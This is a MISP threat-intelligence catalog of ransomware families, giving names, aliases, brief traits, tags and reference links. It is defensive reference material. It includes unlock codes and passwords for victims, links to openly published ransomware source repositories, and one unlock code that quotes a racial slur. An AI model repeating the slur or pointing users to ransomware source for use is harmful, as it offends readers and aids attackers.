Ransomware Locks screen. Ransom note names are an ID. Comes with Bedep.

The tag is: misp-galaxy:ransomware="CryptXXX 2.0"

CryptXXX 2.0 is also known as:

  • CryptProjectXXX

CryptXXX 2.0 has relationships with:

  • similar: misp-galaxy:ransomware="CryptXXX" with estimative-language:likelihood-probability="likely"

Table 8220. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool

http://blogs.cisco.com/security/cryptxxx-technical-deep-dive

https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CTB-Faker

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Faker"

CTB-Faker is also known as:

  • Citroni

Table 8224. Table References

Links

https://id-ransomware.blogspot.com/2016/07/ctb-faker-ransomware-008.html

CuteRansomware

Ransomware Based on my-Little-Ransomware

The tag is: misp-galaxy:ransomware="CuteRansomware"

CuteRansomware is also known as:

  • my-Little-Ransomware

Table 8226. Table References

Links

https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool

https://github.com/aaaddress1/my-Little-Ransomware

Cyber SpLiTTer Vbs

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Cyber SpLiTTer Vbs"

Cyber SpLiTTer Vbs is also known as:

  • CyberSplitter

Cyber SpLiTTer Vbs has relationships with:

  • similar: misp-galaxy:malpedia="CyberSplitter" with estimative-language:likelihood-probability="likely"

Table 8227. Table References

Links

https://twitter.com/struppigel/status/778871886616862720

https://twitter.com/struppigel/status/806758133720698881

https://id-ransomware.blogspot.com/2016/09/cyber-splitter-vbs-ransomware.html

Death Bitches

Ransomware

The tag is: misp-galaxy:ransomware="Death Bitches"

Table 8228. Table References

Links

https://twitter.com/JaromirHorejsi/status/815555258478981121

DeCrypt Protect

Ransomware

The tag is: misp-galaxy:ransomware="DeCrypt Protect"

Table 8229. Table References

Links

http://www.malwareremovalguides.info/decrypt-files-with-decrypt_mblblock-exe-decrypt-protect/

Demo

Ransomware only encrypts .jpg files

The tag is: misp-galaxy:ransomware="Demo"

Demo is also known as:

  • CryptoDemo

Table 8231. Table References

Links

https://twitter.com/struppigel/status/798573300779745281

https://id-ransomware.blogspot.com/2017/10/cryptodemo-ransomware.html

DetoxCrypto

Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte

The tag is: misp-galaxy:ransomware="DetoxCrypto"

Table 8232. Table References

Links

http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/

https://id-ransomware.blogspot.com/2016/08/detoxcrypto-ransomware.html

Digisom

Ransomware

The tag is: misp-galaxy:ransomware="Digisom"

Table 8233. Table References

Links

https://twitter.com/PolarToffee/status/829727052316160000

DMALocker

Ransomware no extension change Encrypted files have prefix: Version 1: ABCXYZ11 - Version 2: !DMALOCK - Version 3: !DMALOCK3.0 - Version 4: !DMALOCK4.0

The tag is: misp-galaxy:ransomware="DMALocker"

Table 8235. Table References

Links

https://decrypter.emsisoft.com/

https://github.com/hasherezade/dma_unlocker

https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg

https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/

DNRansomware

Ransomware Code to decrypt: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT

The tag is: misp-galaxy:ransomware="DNRansomware"

Table 8237. Table References

Links

https://twitter.com/BleepinComputer/status/822500056511213568

DummyLocker

Ransomware

The tag is: misp-galaxy:ransomware="DummyLocker"

Table 8240. Table References

Links

https://twitter.com/struppigel/status/794108322932785158

HiddenTear

Ransomware Open sourced C#

The tag is: misp-galaxy:ransomware="HiddenTear"

HiddenTear is also known as:

  • Cryptear

  • EDA2

  • Hidden Tear

HiddenTear has relationships with:

  • similar: misp-galaxy:malpedia="EDA2" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="HiddenTear" with estimative-language:likelihood-probability="likely"

Table 8242. Table References

Links

http://www.utkusen.com/blog/dealing-with-script-kiddies-cryptear-b-incident.html

https://id-ransomware.blogspot.com/2016/06/hiddentear-2.html

EduCrypt

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="EduCrypt"

EduCrypt is also known as:

  • EduCrypter

Table 8243. Table References

Links

http://www.filedropper.com/decrypter_1

https://twitter.com/JakubKroustek/status/747031171347910656

https://id-ransomware.blogspot.com/2016/06/hiddentear-2.html

EiTest

Ransomware

The tag is: misp-galaxy:ransomware="EiTest"

Table 8244. Table References

Links

https://twitter.com/BroadAnalysis/status/845688819533930497

https://twitter.com/malwrhunterteam/status/845652520202616832

El-Polocker

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="El-Polocker"

El-Polocker is also known as:

  • Los Pollos Hermanos

Table 8245. Table References

Links

https://id-ransomware.blogspot.com/2016/07/el-polocker-ransomware-aes-450-aud.html

Encoder.xxxx

Ransomware Coded in GO

The tag is: misp-galaxy:ransomware="Encoder.xxxx"

Encoder.xxxx is also known as:

  • Trojan.Encoder.6491

Encoder.xxxx has relationships with:

  • similar: misp-galaxy:ransomware="Windows_Security Ransonware" with estimative-language:likelihood-probability="likely"

Table 8246. Table References

Links

http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

http://vms.drweb.ru/virus/?_is=1&i=8747343

encryptoJJS

Ransomware

The tag is: misp-galaxy:ransomware="encryptoJJS"

Table 8247. Table References

Links

https://id-ransomware.blogspot.com/2016/11/encryptojjs-ransomware.html

Enjey

Ransomware Based on RemindMe

The tag is: misp-galaxy:ransomware="Enjey"

Table 8249. Table References

Links

https://twitter.com/malwrhunterteam/status/839022018230112256

Fairware

Ransomware Target Linux O.S.

The tag is: misp-galaxy:ransomware="Fairware"

Table 8250. Table References

Links

http://www.bleepingcomputer.com/news/security/new-fairware-ransomware-targeting-linux-computers/

FakeCryptoLocker

Ransomware

The tag is: misp-galaxy:ransomware="FakeCryptoLocker"

Table 8252. Table References

Links

https://twitter.com/PolarToffee/status/812312402779836416

Fantom

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Fantom"

Fantom is also known as:

  • Comrad Circle

Table 8253. Table References

Links

http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/

FILE FROZR

Ransomware RaaS

The tag is: misp-galaxy:ransomware="FILE FROZR"

FILE FROZR is also known as:

  • FileFrozr

Table 8255. Table References

Links

https://twitter.com/rommeljoven17/status/846973265650335744

https://id-ransomware.blogspot.com/2017/03/filefrozr-ransomware.html

FileLocker

Ransomware

The tag is: misp-galaxy:ransomware="FileLocker"

Table 8256. Table References

Links

https://twitter.com/jiriatvirlab/status/836616468775251968

FireCrypt

Ransomware

The tag is: misp-galaxy:ransomware="FireCrypt"

FireCrypt has relationships with:

  • similar: misp-galaxy:malpedia="FireCrypt" with estimative-language:likelihood-probability="likely"

Table 8257. Table References

Links

https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

https://id-ransomware.blogspot.com/2017/01/bleedgreen-ransomware.html

Flyper

Ransomware Based on EDA2 / HiddenTear

The tag is: misp-galaxy:ransomware="Flyper"

Table 8258. Table References

Links

https://twitter.com/malwrhunterteam/status/773771485643149312

https://id-ransomware.blogspot.com/2016/09/flyper-ransomware.html

Fonco

Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents

The tag is: misp-galaxy:ransomware="Fonco"

FortuneCookie

Ransomware

The tag is: misp-galaxy:ransomware="FortuneCookie"

Table 8259. Table References

Links

https://twitter.com/struppigel/status/842302481774321664

Free-Freedom

Ransomware Unlock code is: adam or adamdude9

The tag is: misp-galaxy:ransomware="Free-Freedom"

Free-Freedom is also known as:

  • Roga

Free-Freedom has relationships with:

  • similar: misp-galaxy:ransomware="Roga" with estimative-language:likelihood-probability="likely"

Table 8260. Table References

Links

https://twitter.com/BleepinComputer/status/812135608374226944

https://id-ransomware.blogspot.com/2016/12/roga-ransomware.html

Fury

Ransomware

The tag is: misp-galaxy:ransomware="Fury"

Table 8262. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

Gingerbread

Ransomware

The tag is: misp-galaxy:ransomware="Gingerbread"

Table 8264. Table References

Links

https://twitter.com/ni_fi_70/status/796353782699425792

GNL Locker

Ransomware Only encrypts DE or NL country. Variants, from old to latest: Zyklon Locker, WildFire locker, Hades Locker

The tag is: misp-galaxy:ransomware="GNL Locker"

GNL Locker has relationships with:

  • similar: misp-galaxy:ransomware="Zyklon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 8266. Table References

Links

http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/

http://id-ransomware.blogspot.ru/2016/05/gnl-locker-ransomware-gnl-locker-ip.html

Gomasom

Ransomware

The tag is: misp-galaxy:ransomware="Gomasom"

Table 8267. Table References

Links

https://decrypter.emsisoft.com/

http://id-ransomware.blogspot.com/2016/05/gomasom-ransonware.html

Goopic

Ransomware

The tag is: misp-galaxy:ransomware="Goopic"

Table 8268. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/

Gopher

Ransomware OS X ransomware (PoC)

The tag is: misp-galaxy:ransomware="Gopher"

Hacked

Ransomware Jigsaw Ransomware variant

The tag is: misp-galaxy:ransomware="Hacked"

Table 8269. Table References

Links

https://twitter.com/demonslay335/status/806878803507101696

http://id-ransomware.blogspot.com/2016/12/hackedlocker-ransomware.html

Harasom

Ransomware

The tag is: misp-galaxy:ransomware="Harasom"

Table 8271. Table References

Links

https://decrypter.emsisoft.com/

HDDCryptor

Ransomware Uses https://diskcryptor.net for full disk encryption

The tag is: misp-galaxy:ransomware="HDDCryptor"

HDDCryptor is also known as:

  • Mamba

HDDCryptor has relationships with:

  • similar: misp-galaxy:malpedia="Mamba" with estimative-language:likelihood-probability="likely"

Table 8272. Table References

Links

https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho

blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/[blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/]

http://id-ransomware.blogspot.com/2016/09/hddcryptor-ransomware-mbr.html

Heimdall

Ransomware File marker: "Heimdall---"

The tag is: misp-galaxy:ransomware="Heimdall"

Table 8273. Table References

Links

https://www.bleepingcomputer.com/news/security/heimdall-open-source-php-ransomware-targets-web-servers/

https://id-ransomware.blogspot.com/2016/11/heimdall-ransomware.html

Help_dcfile

Ransomware

The tag is: misp-galaxy:ransomware="Help_dcfile"

Table 8274. Table References

Links

http://id-ransomware.blogspot.com/2016/09/helpdcfile-ransomware.html

Herbst

Ransomware

The tag is: misp-galaxy:ransomware="Herbst"

Herbst has relationships with:

  • similar: misp-galaxy:malpedia="Herbst" with estimative-language:likelihood-probability="likely"

Table 8275. Table References

Links

https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware

https://id-ransomware.blogspot.com/2016/06/herbst-autumn-ransomware-aes-256-01.html

Hi Buddy!

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Hi Buddy!"

Table 8276. Table References

Links

http://www.nyxbone.com/malware/hibuddy.html

http://id-ransomware.blogspot.ru/2016/05/hi-buddy-ransomware-aes-256-0.html

HolyCrypt

Ransomware

The tag is: misp-galaxy:ransomware="HolyCrypt"

HolyCrypt has relationships with:

  • similar: misp-galaxy:ransomware="Dablio Ransomware" with estimative-language:likelihood-probability="likely"

Table 8278. Table References

Links

http://www.bleepingcomputer.com/news/security/new-python-ransomware-called-holycrypt-discovered/

https://id-ransomware.blogspot.com/2016/07/holycrypt-ransomware.html

HTCryptor

Ransomware Includes a feature to disable the victim’s windows firewall Modified in-dev HiddenTear

The tag is: misp-galaxy:ransomware="HTCryptor"

Table 8279. Table References

Links

https://twitter.com/BleepinComputer/status/803288396814839808

iLock

Ransomware

The tag is: misp-galaxy:ransomware="iLock"

Table 8281. Table References

Links

https://twitter.com/BleepinComputer/status/817085367144873985

iLockLight

Ransomware

The tag is: misp-galaxy:ransomware="iLockLight"

International Police Association

Ransomware CryptoTorLocker2015 variant

The tag is: misp-galaxy:ransomware="International Police Association"

Table 8282. Table References

Links

http://download.bleepingcomputer.com/Nathan/StopPirates_Decrypter.exe

iRansom

Ransomware

The tag is: misp-galaxy:ransomware="iRansom"

Table 8283. Table References

Links

https://twitter.com/demonslay335/status/796134264744083460

http://id-ransomware.blogspot.com/2016/11/iransom-ransomware.html

JagerDecryptor

Ransomware Prepends filenames

The tag is: misp-galaxy:ransomware="JagerDecryptor"

Table 8284. Table References

Links

https://twitter.com/JakubKroustek/status/757873976047697920

Jeiphoos

Ransomware Windows, Linux. Campaign stopped. Actor claimed he deleted the master key.

The tag is: misp-galaxy:ransomware="Jeiphoos"

Jeiphoos is also known as:

  • Encryptor RaaS

  • Sarento

Table 8285. Table References

Links

http://www.nyxbone.com/malware/RaaS.html

http://blog.trendmicro.com/trendlabs-security-intelligence/the-rise-and-fall-of-encryptor-raas/

Jhon Woddy

Ransomware Same codebase as DNRansomware Lock screen password is M3VZ>5BwGGVH

The tag is: misp-galaxy:ransomware="Jhon Woddy"

Table 8286. Table References

Links

https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip

https://twitter.com/BleepinComputer/status/822509105487245317

Jigsaw

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="Jigsaw"

Jigsaw is also known as:

  • CryptoHitMan

  • Jigsaw Original

Jigsaw has relationships with:

  • similar: misp-galaxy:malpedia="Jigsaw" with estimative-language:likelihood-probability="likely"

Table 8287. Table References

Links

http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/

https://www.helpnetsecurity.com/2016/04/20/jigsaw-crypto-ransomware/

https://twitter.com/demonslay335/status/795819556166139905

https://id-ransomware.blogspot.com/2016/04/jigsaw-ransomware.html

Job Crypter

Ransomware Based on HiddenTear, but uses TripleDES, decrypter is PoC

The tag is: misp-galaxy:ransomware="Job Crypter"

Job Crypter is also known as:

  • JobCrypter

Table 8288. Table References

Links

http://www.nyxbone.com/malware/jobcrypter.html

http://forum.malekal.com/jobcrypter-geniesanstravaille-extension-locked-crypto-ransomware-t54381.html

https://twitter.com/malwrhunterteam/status/828914052973858816

http://id-ransomware.blogspot.com/2016/05/jobcrypter-ransomware.html

JohnyCryptor

Ransomware

The tag is: misp-galaxy:ransomware="JohnyCryptor"

Table 8289. Table References

Links

http://id-ransomware.blogspot.com/2016/04/johnycryptor-ransomware.html

KawaiiLocker

Ransomware

The tag is: misp-galaxy:ransomware="KawaiiLocker"

Table 8290. Table References

Links

https://safezone.cc/resources/kawaii-decryptor.195/

http://id-ransomware.blogspot.com/2016/09/kawaiilocker-ransomware.html

KeRanger

Ransomware OS X Ransomware

The tag is: misp-galaxy:ransomware="KeRanger"

KeRanger has relationships with:

  • similar: misp-galaxy:malpedia="KeRanger" with estimative-language:likelihood-probability="likely"

Table 8291. Table References

Links

http://news.drweb.com/show/?i=9877&lng=en&c=5

http://www.welivesecurity.com/2016/03/07/new-mac-ransomware-appears-keranger-spread-via-transmission-app/

https://id-ransomware.blogspot.com/2016/03/keranger-ransomware.html

KeyBTC

Ransomware

The tag is: misp-galaxy:ransomware="KeyBTC"

Table 8292. Table References

Links

https://decrypter.emsisoft.com/

KillerLocker

Ransomware Possibly Portuguese dev

The tag is: misp-galaxy:ransomware="KillerLocker"

Table 8294. Table References

Links

https://twitter.com/malwrhunterteam/status/782232299840634881

http://id-ransomware.blogspot.com/2016/10/killerlocker-ransomware.html

Korean

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Korean"

Table 8296. Table References

Links

http://www.nyxbone.com/malware/koreanRansom.html

http://id-ransomware.blogspot.com/2016/08/korean-ransomware.html

KryptoLocker

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="KryptoLocker"

Table 8299. Table References

Links

https://id-ransomware.blogspot.com/2016/07/kryptolocker-ransomware-aes-256.html

LanRan

Ransomware Variant of open-source MyLittleRansomware

The tag is: misp-galaxy:ransomware="LanRan"

Table 8300. Table References

Links

https://twitter.com/struppigel/status/847689644854595584

http://id-ransomware.blogspot.com/2017/03/lanran-ransomware.html

LeChiffre

Ransomware Encrypts first 0x2000 and last 0x2000 bytes. Via remote attacker

The tag is: misp-galaxy:ransomware="LeChiffre"

Table 8301. Table References

Links

https://decrypter.emsisoft.com/lechiffre

https://blog.malwarebytes.org/threat-analysis/2016/01/lechiffre-a-manually-run-ransomware/

http://id-ransomware.blogspot.com/2016/05/lechiffre-ransomware.html

Lick

Ransomware Variant of Kirk

The tag is: misp-galaxy:ransomware="Lick"

Table 8302. Table References

Links

https://twitter.com/JakubKroustek/status/842404866614038529

https://www.2-spyware.com/remove-lick-ransomware-virus.html

Linux.Encoder

Ransomware Linux Ransomware

The tag is: misp-galaxy:ransomware="Linux.Encoder"

Linux.Encoder is also known as:

  • Linux.Encoder.{0,3}

Table 8303. Table References

Links

https://labs.bitdefender.com/2015/11/linux-ransomware-debut-fails-on-predictable-encryption-key/

LK Encryption

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="LK Encryption"

Table 8304. Table References

Links

https://twitter.com/malwrhunterteam/status/845183290873044994

http://id-ransomware.blogspot.com/2017/03/lk-encryption-ransomware.html

LLTP Locker

Ransomware Targeting Spanish speaking victims

The tag is: misp-galaxy:ransomware="LLTP Locker"

Table 8305. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/

http://id-ransomware.blogspot.com/2017/03/lltp-ransomware.html

Locker

Ransomware has GUI

The tag is: misp-galaxy:ransomware="Locker"

Locker is also known as:

  • LockeR

Table 8306. Table References

Links

http://www.bleepingcomputer.com/forums/t/577246/locker-ransomware-support-and-help-topic/page-32#entry3721545

https://id-ransomware.blogspot.com/2016/04/locker-ransomware-2015.html

Lortok

Ransomware

The tag is: misp-galaxy:ransomware="Lortok"

Table 8309. Table References

Links

https://id-ransomware.blogspot.com/2016/06/lortok-ransomware-aes-256-5.html

LowLevel04

Ransomware Prepends filenames

The tag is: misp-galaxy:ransomware="LowLevel04"

Table 8310. Table References

Links

http://id-ransomware.blogspot.com/2016/04/lowlevel04-ransomware.html

M4N1F3STO

Ransomware Does not encrypt Unlock code=suckmydicknigga

The tag is: misp-galaxy:ransomware="M4N1F3STO"

Table 8311. Table References

Links

https://twitter.com/jiriatvirlab/status/808015275367002113

http://id-ransomware.blogspot.com/2016/12/m4n1f3sto-ransomware.html

Mabouia

Ransomware OS X ransomware (PoC)

The tag is: misp-galaxy:ransomware="Mabouia"

Table 8312. Table References

Links

https://www.youtube.com/watch?v=9nJv_PN2m1Y

MacAndChess

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MacAndChess"

Table 8313. Table References

Links

http://id-ransomware.blogspot.com/2017/03/macandchess-ransomware.html

Magic

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Magic"

Table 8314. Table References

Links

http://id-ransomware.blogspot.com/2016/04/magic-ransomware.html

Meister

Ransomware Targeting French victims

The tag is: misp-galaxy:ransomware="Meister"

Table 8317. Table References

Links

https://twitter.com/siri_urz/status/840913419024945152

Meteoritan

Ransomware

The tag is: misp-galaxy:ransomware="Meteoritan"

Table 8318. Table References

Links

https://twitter.com/malwrhunterteam/status/844614889620561924

http://id-ransomware.blogspot.com/2017/03/meteoritan-ransomware.html

MireWare

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MireWare"

Table 8320. Table References

Links

http://id-ransomware.blogspot.com/2016/05/mireware-ransomware.html

Mischa

Ransomware Packaged with Petya PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Mischa"

Mischa is also known as:

  • "Petya’s little brother"

  • Misha

  • Petya+Mischa

  • Petya-2

Table 8321. Table References

Links

http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/

https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html

MM Locker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="MM Locker"

MM Locker is also known as:

  • Booyah

MM Locker has relationships with:

  • similar: misp-galaxy:ransomware="Booyah" with estimative-language:likelihood-probability="likely"

Table 8322. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered

https://id-ransomware.blogspot.com/2016/06/mm-locker-ransomware-aes-2256-1.html

Mobef

Ransomware

The tag is: misp-galaxy:ransomware="Mobef"

Mobef is also known as:

  • Yakes

  • CryptoBit

Mobef has relationships with:

  • similar: misp-galaxy:ransomware="CryptoBit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Mobef-JustFun" with estimative-language:likelihood-probability="likely"

Table 8323. Table References

Links

http://nyxbone.com/malware/Mobef.html

http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/

http://nyxbone.com/images/articulos/malware/mobef/0.png

http://id-ransomware.blogspot.com/2016/05/mobef-yakes-ransomware-4-bitcoins-2000.html

Monument

Ransomware Use the DarkLocker 5 porn screenlocker - Jigsaw variant

The tag is: misp-galaxy:ransomware="Monument"

Table 8324. Table References

Links

https://twitter.com/malwrhunterteam/status/844826339186135040

N-Splitter

Ransomware Russian Koolova Variant

The tag is: misp-galaxy:ransomware="N-Splitter"

Table 8325. Table References

Links

https://twitter.com/JakubKroustek/status/815961663644008448

https://www.youtube.com/watch?v=dAVMgX8Zti4&feature=youtu.be&list=UU_TMZYaLIgjsdJMwurHAi4Q

n1n1n1

Ransomware Filemaker: "333333333333"

The tag is: misp-galaxy:ransomware="n1n1n1"

n1n1n1 is also known as:

  • N1N1N1

Table 8326. Table References

Links

https://twitter.com/demonslay335/status/790608484303712256

https://twitter.com/demonslay335/status/831891344897482754

http://id-ransomware.blogspot.com/2016/09/n1n1n1-ransomware.html

NanoLocker

Ransomware no extension change, has a GUI

The tag is: misp-galaxy:ransomware="NanoLocker"

NanoLocker has relationships with:

  • similar: misp-galaxy:malpedia="NanoLocker" with estimative-language:likelihood-probability="likely"

Table 8327. Table References

Links

http://github.com/Cyberclues/nanolocker-decryptor

https://id-ransomware.blogspot.com/2016/06/nanolocker-ransomware-aes-256-rsa-01.html

Nemucod

Ransomware 7zip (a0.exe) variant cannot be decrypted Encrypts the first 2048 Bytes

The tag is: misp-galaxy:ransomware="Nemucod"

Nemucod is also known as:

  • Nemucod-7z

  • Nemucod-AES

Table 8328. Table References

Links

https://decrypter.emsisoft.com/nemucod

https://github.com/Antelox/NemucodFR

http://www.bleepingcomputer.com/news/security/decryptor-released-for-the-nemucod-trojans-crypted-ransomware/

https://blog.cisecurity.org/malware-analysis-report-nemucod-ransomware/

http://id-ransomware.blogspot.com/2016/04/nemucod-ransomware.html

Netix

Ransomware

The tag is: misp-galaxy:ransomware="Netix"

Netix is also known as:

  • RANSOM_NETIX.A

Table 8329. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/

https://id-ransomware.blogspot.com/2017/01/netflix-ransomware.html

Nhtnwcuf

Ransomware Does not encrypt the files / Files are destroyed

The tag is: misp-galaxy:ransomware="Nhtnwcuf"

Table 8330. Table References

Links

https://twitter.com/demonslay335/status/839221457360195589

http://id-ransomware.blogspot.com/2017/03/nhtnwcuf-ransomware.html

NMoreira

Ransomware

The tag is: misp-galaxy:ransomware="NMoreira"

NMoreira is also known as:

  • XRatTeam

  • XPan

Table 8331. Table References

Links

https://decrypter.emsisoft.com/nmoreira

https://twitter.com/fwosar/status/803682662481174528

id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html[id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html]

Nuke

Ransomware

The tag is: misp-galaxy:ransomware="Nuke"

Table 8333. Table References

Links

http://id-ransomware.blogspot.com/2016/10/nuke-ransomware.html

Offline ransomware

Ransomware email addresses overlap with .777 addresses

The tag is: misp-galaxy:ransomware="Offline ransomware"

Offline ransomware is also known as:

  • Vipasana

  • Cryakl

Offline ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Cryakl" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Cryakl" with estimative-language:likelihood-probability="likely"

Table 8336. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

http://bartblaze.blogspot.com.co/2016/02/vipasana-ransomware-new-ransom-on-block.html

OMG! Ransomware

Ransomware. Infection: drive-by-download; Platform: Windows; Extorsion by Prepaid Voucher

The tag is: misp-galaxy:ransomware="OMG! Ransomware"

OMG! Ransomware is also known as:

  • GPCode

OMG! Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="GPCode" with estimative-language:likelihood-probability="likely"

Table 8337. Table References

Links

https://arxiv.org/pdf/2102.06249.pdf

Operation Global III

Ransomware Is a file infector (virus)

The tag is: misp-galaxy:ransomware="Operation Global III"

Table 8338. Table References

Links

http://news.thewindowsclub.com/operation-global-iii-ransomware-decryption-tool-released-70341/

Owl

Ransomware

The tag is: misp-galaxy:ransomware="Owl"

Owl is also known as:

  • CryptoWire

Owl has relationships with:

  • similar: misp-galaxy:malpedia="CryptoWire" with estimative-language:likelihood-probability="likely"

Table 8339. Table References

Links

https://twitter.com/JakubKroustek/status/842342996775448576

https://id-ransomware.blogspot.com/2016/10/cryptowire-ransomware.html

PadCrypt

Ransomware has a live support chat

The tag is: misp-galaxy:ransomware="PadCrypt"

PadCrypt has relationships with:

  • similar: misp-galaxy:malpedia="PadCrypt" with estimative-language:likelihood-probability="likely"

Table 8340. Table References

Links

http://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/

https://twitter.com/malwrhunterteam/status/798141978810732544

http://id-ransomware.blogspot.com/2016/04/padcrypt-ransomware.html

Padlock Screenlocker

Ransomware Unlock code is: ajVr/G\ RJz0R

The tag is: misp-galaxy:ransomware="Padlock Screenlocker"

Table 8341. Table References

Links

https://twitter.com/BleepinComputer/status/811635075158839296

Patcher

Ransomware Targeting macOS users

The tag is: misp-galaxy:ransomware="Patcher"

Patcher has relationships with:

  • similar: misp-galaxy:ransomware="FileCoder" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Table 8342. Table References

Links

https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/

https://www.bleepingcomputer.com/news/security/new-macos-patcher-ransomware-locks-data-for-good-no-way-to-recover-your-files/

Petya

Ransomware encrypts disk partitions PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Petya"

Petya is also known as:

  • Goldeneye

Petya has relationships with:

  • similar: misp-galaxy:malpedia="Petya" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="GoldenEye Ransomware" with estimative-language:likelihood-probability="likely"

Table 8343. Table References

Links

http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator

https://www.youtube.com/watch?v=mSqxFjZq_z4

https://blog.malwarebytes.org/threat-analysis/2016/04/petya-ransomware/

https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/

Philadelphia

Ransomware Coded by "The_Rainmaker"

The tag is: misp-galaxy:ransomware="Philadelphia"

Table 8344. Table References

Links

https://decrypter.emsisoft.com/philadelphia

www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/[www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/]

http://id-ransomware.blogspot.ru/2016/09/philadelphia-ransomware.html

Polyglot

Ransomware Immitates CTB-Locker

The tag is: misp-galaxy:ransomware="Polyglot"

Polyglot has relationships with:

  • similar: misp-galaxy:malpedia="Polyglot" with estimative-language:likelihood-probability="likely"

Table 8347. Table References

Links

https://support.kaspersky.com/8547

https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/

PowerWorm

Ransomware no decryption possible, throws key away, destroys the files

The tag is: misp-galaxy:ransomware="PowerWorm"

PRISM

Ransomware

The tag is: misp-galaxy:ransomware="PRISM"

Table 8350. Table References

Links

http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/

Ps2exe

Ransomware

The tag is: misp-galaxy:ransomware="Ps2exe"

Table 8351. Table References

Links

https://twitter.com/jiriatvirlab/status/803297700175286273

R

Ransomware

The tag is: misp-galaxy:ransomware="R"

R is also known as:

  • NM3

Table 8352. Table References

Links

https://twitter.com/malwrhunterteam/status/846705481741733892

http://id-ransomware.blogspot.com/2017/03/r-ransomware.html

RAA encryptor

Ransomware Possible affiliation with Pony

The tag is: misp-galaxy:ransomware="RAA encryptor"

RAA encryptor is also known as:

  • RAA

  • RAA SEP

Table 8354. Table References

Links

https://reaqta.com/2016/06/raa-ransomware-delivering-pony/

http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/

https://id-ransomware.blogspot.com/2016/06/raa-ransomware-aes-256-039-250.html

Rabion

Ransomware RaaS Copy of Ranion RaaS

The tag is: misp-galaxy:ransomware="Rabion"

Table 8355. Table References

Links

https://twitter.com/CryptoInsane/status/846181140025282561

Radamant

Ransomware

